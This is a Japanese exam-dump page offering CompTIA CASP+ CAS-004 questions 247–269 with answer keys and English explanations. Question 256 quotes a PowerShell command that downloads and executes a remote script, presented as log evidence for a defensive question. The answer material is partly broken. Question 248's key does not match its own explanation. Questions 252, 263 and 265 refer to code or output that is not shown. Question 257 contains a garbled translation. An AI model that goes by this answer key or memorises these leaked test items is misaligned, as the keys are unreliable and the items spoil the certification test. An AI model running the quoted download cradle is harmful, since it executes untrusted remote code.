[2024年06月15日] 無料CompTIA CASP CAS-004日本語公式認定ガイドPDFダウンロード [Q247-Q269]

Share

[2024年06月15日] 無料CompTIA CASP CAS-004日本語公式認定ガイドPDFダウンロード

CompTIA CAS-004日本語公式認定ガイドPDF

質問 # 247
ICS に出力する電力量を伝えるメッセージを制御するために暗号化を適用する場合、最も重要なセキュリティ目標は次のうちどれですか?

  • A. メッセージの完全性の保証
  • B. メッセージの否認防止の保証
  • C. メッセージの可用性のインポート
  • D. メッセージのプロトコル準拠を強制する

正解:A

解説:
Explanation
Assuring the integrity of messages is the most important security objective when applying cryptography to control messages that tell an ICS (industrial control system) how much electrical power to output. Integrity is the security objective that ensures the accuracy and completeness of data or information, preventing unauthorized modifications or tampering. Assuring the integrity of messages can prevent malicious or accidental changes to the control messages that could affect the operation or safety of the ICS or the electrical power output. Importing the availability of messages is not a security objective when applying cryptography, but a security objective that ensures the accessibility and usability of data or information, preventing unauthorized denial or disruption of service. Ensuring non-repudiation of messages is not a security objective when applying cryptography, but a security objective that ensures the authenticity and accountability of data or information, preventing unauthorized denial or dispute of actions or transactions. Enforcing protocol conformance for messages is not a security objective when applying cryptography, but a security objective that ensures the compliance and consistency of data or information, preventing unauthorized deviations or violations of rules or standards. Verified References: https://www.comptia.org/blog/what-is-integrity
https://partners.comptia.org/docs/default-source/resources/casp-content-guide


質問 # 248
企業は機密性の高いワークロードをクラウドから移動し、Web ベースのアプリケーションの高可用性と回復力を確保する必要があります。クラウド アーキテクチャ チームには、次の要件が与えられました。
* アプリケーションは常に 70% の容量で実行する必要があります
* アプリケーションは、DoS および DDoS 攻撃に耐える必要があります。
* サービスは自動的に回復する必要があります。
クラウド アーキテクチャ チームが実装する必要があるのは、次のうちどれですか? (3 つを選択)。

  • A. WAF
  • B. 暗号化
  • C. 自動スケーリング
  • D. BCP
  • E. 封じ込め
  • F. 読み取り専用レプリカ
  • G. CDN
  • H. 連続スナップショット

正解:A、B、C

解説:
Explanation
The cloud architecture team should implement Autoscaling (C), WAF (D) and Encryption (F). Autoscaling (C) will ensure that the application is running at 70% capacity at all times. WAF (D) will protect the application from DoS and DDoS attacks. Encryption (F) will protect the data from unauthorized access and ensure that the sensitive workloads remain secure.


質問 # 249
セキュリティ アーキテクトは、新しい顧客と協力して、次の要件を満たす脆弱性評価ソリューションを探しています。
*高速スキャン
* 可能な限り誤検知を最小限に抑える
* 署名ベース
* スキャン実行時のサーバーへの影響が少ない
さらに、顧客はいくつかの選別されたサブネット、VLAN、およびブランチ オフィスを持っています。顧客のニーズを最もよく満たすのは次のうちどれですか?

  • A. パッシブ スキャン
  • B. 認証されていないスキャン
  • C. 認証されたスキャン
  • D. エージェントベースのスキャン

正解:D

解説:
Agent-based scanning is best suited for environments with multiple subnets, VLANs, and branch offices, as described. It allows for fast scanning with fewer false positives, and since the agents are installed on the servers, they tend to have a lower impact on performance. This type of scanning also facilitates signature-based scanning, which is one of the customer's requirements.


質問 # 250
ネットワーク アーキテクトは、すべてのローカル サイトを中央のハブ サイトに接続する新しい SD-WAN アーキテクチャを設計しています。その後、ハブはトラフィックをパブリック クラウドおよびデータセンター アプリケーションにリダイレクトする役割を果たします。SD-WAN ルーターは SaaS を通じて管理され、オフィスでも遠隔地でも同じセキュリティ ポリシーがスタッフに適用されます。主な要件は次のとおりです。
1. ネットワークは、稼働率 99.99% のコア アプリケーションをサポートします。
2. SD-WAN ルーターの構成の更新は、管理サービスからのみ開始できます。
3. Web サイトからダウンロードしたドキュメントは、マルウェアをスキャンする必要があります。
要件を満たすためにネットワーク アーキテクトが実装する必要があるソリューションは次のうちどれですか?

  • A. IDS、WAF、およびフォワード プロキシ IDS
  • B. ローカル サイトでのリバース プロキシ、ステートフル ファイアウォール、および VPN
  • C. ハブ サイトでの DoS 保護、相互証明書認証、およびクラウド プロキシ
  • D. ハブの IPS、レイヤー 4 ファイアウォール、および DLP

正解:C


質問 # 251
大規模な多国籍メーカーのセキュリティ アーキテクトは、トラフィックを監視するためのセキュリティ ソリューションを設計および実装する必要があります。
ソリューションを設計する際、OT ネットワークに対する攻撃を防ぐために、セキュリティ アーキテクトが注目すべき脅威は次のうちどれですか?

  • A. サポートされていない暗号化アルゴリズムの適用
  • B. 時間の経過とともに複数の要請された応答
  • C. DNP3 ポートでの非 DNP3 通信の使用
  • D. サイズまたは長さが間違っているパケット

正解:B


質問 # 252
開発者は次のコード スニペットを実装します。

コード スニペットによって解決される脆弱性は次のうちどれですか?

  • A. バッファオーバーフロー
  • B. セッション制限がありません
  • C. SQL インジェクション
  • D. 情報漏洩

正解:C

解説:
Explanation
SQL injection is a type of vulnerability that allows an attacker to execute malicious SQL commands on a database by inserting them into an input field. The code snippet resolves this vulnerability by using parameterized queries, which prevent the input from being interpreted as part of the SQL command. Verified References: https://www.comptia.org/training/books/casp-cas-004-study-guide ,
https://owasp.org/www-community/attacks/SQL_Injection


質問 # 253
次の契約のうち、罰則がなく、同じ目標に向かって協力している 2 つの団体が署名できるものはどれですか?

  • A. SLA
  • B. NDA
  • C. MOU
  • D. ISA

正解:C


質問 # 254
次の用語のうち、CASB またはサードパーティ エンティティへの暗号化キーの配信を指すものはどれですか?

  • A. キーエスクロー
  • B. キーリカバリ
  • C. 鍵共有
  • D. キー配布

正解:A


質問 # 255
セキュリティ エンジニアは、ローカル管理者アカウントの可視性と制御を強化することで、ユーザー エンドポイントのセキュリティ体制を強化するソリューションを実装する必要があります。エンドポイント セキュリティ チームは大量のアラートに圧倒されており、運用上の負担を最小限に抑えたソリューションを求めています。さらに、ソリューションは、実装後もユーザー エクスペリエンスを良好に維持する必要があります。
これらの目的を達成するための最適なソリューションは次のうちどれですか?

  • A. PAM を実装し、ローカル管理者グループからユーザーを削除し、昇格された特権が必要な場合はユーザーに明示的な承認を求めます。
  • B. EDR を実装し、ローカル管理者グループからユーザーを削除し、権限昇格の監視を有効にします。
  • C. EDR を実装し、ユーザーをローカル管理者グループに保持し、ユーザーの行動分析を有効にします。
  • D. Privileged Access Management (PAM) を実装し、ユーザーをローカル管理者グループに保持し、ローカル管理者アカウントの監視を有効にします。

正解:A

解説:
To improve accounts lifecycle and management, it is recommended you manage privilege access management within PAM, by importing the local administrators into PAM, reducing the number of local administrators and prevent them to see those accounts passwords.


質問 # 256
セキュリティ アナリストは、外部向けメール サーバーへのログイン試行の失敗数が着実に増加していることに気づきました。ジャンプ ボックスの 1 つを調査しているときに、アナリストはログ ファイルで次のことを特定しました: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl' );whois 次のセキュリティ制御のうち、警告を発して攻撃の次の段階を阻止するものはどれですか?

  • A. リバースプロキシとサンドボックス
  • B. ウイルス対策と UEBA
  • C. EDR およびアプリケーション承認済みリスト
  • D. フォワードプロキシとMFA

正解:C

解説:
An EDR and whitelist should protect from this attack.


質問 # 257
最高情報責任者 (CIO) は、システム管理者に、次の要件に基づいて会社の電子メール セキュリティを改善するよう依頼します。
・不正な個人からの取引依頼。
* 顧客名、口座番号、および投資情報に関する完全な裁量。
* マルウェアやランサムウェアへの電子メールを使用する悪意のある攻撃者。
* 機密性の高い企業情報の流出。
クラウドベースの電子メール ソリューションは、マルウェア対策のレピュテーション ベースのスキャン、シグネチャ ベースのスキャン、およびサンドボックス化を提供します。この電子メールの移行に関するイノシシの懸念を解決するための最良のオプションは次のうちどれですか?

  • A. エンドポイント検出応答
  • B. アプリケーションのホワイトリスト
  • C. データ損失防止
  • D. SSL VPN

正解:C

解説:
Data loss prevention (DLP) is the best option to resolve the board's concerns for this email migration. DLP is a set of tools and policies that aim to prevent unauthorized access, disclosure, or exfiltration of sensitive data. DLP can monitor, filter, encrypt, or block email messages based on predefined rules and criteria, such as content, sender, recipient, attachment, etc. DLP can help protect transactions, customer data, and company information from being compromised by malicious actors or accidental leaks. Verified Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide , https://www.csoonline.com/article/3245746/what-is-dlp-data-loss-prevention-and-how-does-it-work.html


質問 # 258
組織のハント チームは、永続的な脅威が存在し、企業ネットワークにすでに足場を築いていると考えています。
敵対者が悪意のあるアクティビティを発見するように仕向けるために、ハント チームが使用するのに最適な手法は次のうちどれですか?

  • A. 隣接するホストにおとりファイルを実装します。
  • B. 新しい分離およびセグメンテーション スキームを適用します。
  • C. SOAR ツールをデプロイします。
  • D. ユーザーのパスワード履歴と長さの要件を変更します。

正解:A

解説:
Explanation
Implementing decoy files on adjacent hosts is a technique that can entice the adversary to uncover malicious activity, as it can lure them into accessing fake or irrelevant data that can trigger an alert or reveal their presence. Decoy files are also known as honeyfiles or honeypots, and they are part of deception technology.
Deploying a SOAR (Security Orchestration Automation and Response) tool may not entice the adversary to uncover malicious activity, as SOAR is mainly focused on automating and streamlining security operations, not deceiving attackers. Modifying user password history and length requirements may not entice the adversary to uncover malicious activity, as it could affect legitimate users and not reveal the attacker's actions.
Applying new isolation and segmentation schemes may not entice the adversary to uncover malicious activity, as it could limit their access and movement, but not expose their presence. Verified References:
https://www.comptia.org/blog/what-is-deception-technology
https://partners.comptia.org/docs/default-source/resources/casp-content-guide


質問 # 259
ある組織が最近、ランサムウェア攻撃を受けました。セキュリティ チームのリーダーは、攻撃の再発を懸念しています。ただし、それ以上のセキュリティ対策は実装されていません。
次のプロセスのうち、潜在的な防止の推奨事項を特定するために使用できるものはどれですか?

  • A. 検出
  • B. 修復
  • C. 回復
  • D. 準備

正解:D

解説:
Preparation is the process that can be used to identify potential prevention recommendations after a security incident, such as a ransomware attack. Preparation involves planning and implementing security measures to prevent or mitigate future incidents, such as by updating policies, procedures, or controls, conducting training or awareness campaigns, or acquiring new tools or resources. Detection is the process of discovering or identifying security incidents, not preventing them. Remediation is the process of containing or resolving security incidents, not preventing them. Recovery is the process of restoring normal operations after security incidents, not preventing them. Verified Reference: https://www.comptia.org/blog/what-is-incident-response https://partners.comptia.org/docs/default-source/resources/casp-content-guide


質問 # 260
ある会社は、会社所有の電話からモバイル デバイスの BYOD 戦略に移行しています。パイロット プログラムは経営管理チームから開始され、段階的に残りのスタッフに展開されます。会社の最高財務責任者は年に何度も電話を紛失します。
次のうち、紛失したデバイスのデータを保護する可能性が最も高いのはどれですか?

  • A. 個人のリスクに基づいて異なるプロファイルを設定します。
  • B. 会社のデータにアクセスするには、VPN を有効にする必要があります。
  • C. 会社のアプリケーションにアクセスするには MFA が必要です。
  • D. デバイスをリモートでワイプします。

正解:D

解説:
Remotely wiping the device is the best way to secure the data on the lost device, as it would erase all the data and prevent unauthorized access. Requiring a VPN to be active to access company data may not protect the data on the device itself, as it could be stored locally or cached. Setting up different profiles based on the person's risk may not prevent data loss or theft, as it depends on the level of access and encryption. Requiring MFA to access company applications may not protect the data on the device itself, as it could be stored locally or cached. Verified Reference: https://www.comptia.org/blog/what-is-byod https://partners.comptia.org/docs/default-source/resources/casp-content-guide


質問 # 261
会社の従業員は、海外旅行中に会社のシステムにアクセスすることは許可されていません。会社の電子メール システムは、地理的な場所に基づいてログインをブロックするように構成されていますが、一部の従業員は携帯電話が移動中の電子メールを同期し続けていると報告しています。最も可能性が高いのは次のうちどれですか? (2 つ選択してください。)

  • A. モバイル デバイス上の VPN
  • B. モバイル デバイスで GPS を無効にします
  • C. 権限昇格攻撃
  • D. 無制限の電子メール管理者アカウント
  • E. 主に UDP プロトコルを使用
  • F. 時代遅れのエスカレーション攻撃

正解:A、B


質問 # 262
ある会社は、グローバル サービスの展開を準備しています。
GDPR コンプライアンスを確保するために会社が行う必要があるのは、次のうちどれですか? (2つ選んでください。)

  • A. データ削除機能を提供します。
  • B. オプションのデータ暗号化を提供します。
  • C. 保存されているデータについてユーザーに通知します。
  • D. 第三者にデータ アクセスを許可します。
  • E. マーケティング メッセージのオプトイン/オプトアウトを提供します。
  • F. 代替の認証技術を提供します。

正解:A、C

解説:
Explanation
The main rights for individuals under the GDPR are to:
allow subject access
have inaccuracies corrected
have information erased
prevent direct marketing
prevent automated decision-making and profiling
allow data portability (as per the paragraph above)
source: https://www.clouddirect.net/11-things-you-must-do-now-for-gdpr-compliance/


質問 # 263
セキュリティ アナリストは、次の出力を確認しています。

このタイプの攻撃を最も緩和するのは、次のうちどれですか?

  • A. IDS の実装
  • B. ネットワーク ファイアウォールのインストール
  • C. WAF をインラインに配置する
  • D. ハニーポットのデプロイ

正解:C

解説:
The output shows a SQL injection attack that is trying to exploit a web application. A WAF (Web Application Firewall) is a security solution that can detect and block malicious web requests, such as SQL injection, XSS, CSRF, etc. Placing a WAF inline would prevent the attack from reaching the web server and database. Reference: https://owasp.org/www-community/attacks/SQL_Injection https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/


質問 # 264
e コマース企業はオンプレミスで Web サーバーを実行しており、リソースの使用率は通常 30% 未満です。過去 2 年間のホリデー シーズン中、接続が多すぎるためにサーバーでパフォーマンスの問題が発生し、数人の顧客が注文書を確定できませんでした。同社は、この種のパフォーマンスの問題を回避するためにサーバー構成を変更しようとしています。
最も費用対効果の高いソリューションは次のうちどれですか?

  • A. サーバーをクラウド プロバイダーに移動します。
  • B. 新しいサーバーを購入し、アクティブ/アクティブ クラスターを作成します。
  • C. オペレーティング システムを変更します。
  • D. サーバーを新しいものにアップグレードします。

正解:A


質問 # 265
ペネトレーション テスターは次のコマンドを入力します。

このコマンドにより、ペネトレーション テスターは次のことを確立できるようになります。

  • A. プロキシ チェーン
  • B. ネットワーク ピボット
  • C. ポートミラー
  • D. リバースシェル

正解:D

解説:
The command depicted is indicative of a reverse shell, which is a type of shell where the target system initiates an outgoing connection to a remote host, and then standard input and output of the command line interface on the target system is redirected through this connection to the remote host. This is typically used by an attacker after exploitation to open a remote command line interface to control the compromised machine.


質問 # 266
中小企業では、制作および販売するオーディオ録音の盗難を検出するための低コストのアプローチが必要です。
次の手法のうち、ビジネスのニーズを満たす可能性が最も高いのはどれですか?

  • A. すべてのデジタル オーディオ ファイルのディープ パケット インスペクションを実行する
  • B. DRM スイートの購入とインストール
  • C. デジタル オーディオ ファイルへの識別ファイルシステム メタデータの追加
  • D. ステガノグラフィーの実装

正解:D

解説:
Steganography is a technique that can hide data within other files or media, such as images, audio, or video. This can provide a low-cost approach to theft detection for the audio recordings produced and sold by the small business, as it can embed identifying information or watermarks in the audio files that can reveal their origin or ownership. Performing deep-packet inspection of all digital audio files may not be feasible or effective for theft detection, as it could consume a lot of bandwidth and resources, and it may not detect hidden data within encrypted packets. Adding identifying filesystem metadata to the digital audio files may not provide enough protection for theft detection, as filesystem metadata can be easily modified or removed by unauthorized parties. Purchasing and installing a DRM (digital rights management) suite may not be a low-cost approach for theft detection, as it could involve licensing fees and hardware requirements. Verified Reference: https://www.comptia.org/blog/what-is-steganography https://partners.comptia.org/docs/default-source/resources/casp-content-guide


質問 # 267
セキュリティ アナリストは、最近の侵入テストから提供されたデータを使用して CVSS スコアを計算し、修復に優先順位を付けています。アナリストが全体的なスコアを取得するには、次の指標グループのうちどれを決定する必要がありますか? (3 つを選択)。

  • A. インパクト
  • B. 環境
  • C. 在庫状況
  • D. 機密保持
  • E. 攻撃ベクトル
  • F. 時間的
  • G. 誠実さ
  • H. ベース

正解:B、F、H

解説:
The three metric groups that are needed to calculate CVSS scores are Base, Temporal, and Environmental. The Base metrics represent the intrinsic characteristics of a vulnerability that are constant over time and across user environments. The Temporal metrics represent the characteristics of a vulnerability that may change over time but not across user environments. The Environmental metrics represent the characteristics of a vulnerability that are relevant and unique to a particular user's environment. Verified Reference:
https://nvd.nist.gov/vuln-metrics/cvss
https://www.first.org/cvss/specification-document


質問 # 268
リスク戦略の一環として、企業はサイバーセキュリティ インシデントに対する保険の購入を検討しています。
次のうち、この種のリスク対応を最もよく表しているのはどれですか?

  • A. リスク軽減
  • B. リスク回避
  • C. リスク移転
  • D. リスク拒否

正解:C


質問 # 269
......

無料CAS-004日本語試験問題集試験点数を伸ばそう:https://jp.fast2test.com/CAS-004-JPN-premium-file.html


弊社を連絡する

我々は12時間以内ですべてのお問い合わせを答えます。

我々の働いている時間: ( GMT 0:00-15:00 )
月曜日から土曜日まで

サポート: 現在連絡 

English Deutsch 繁体中文 한국어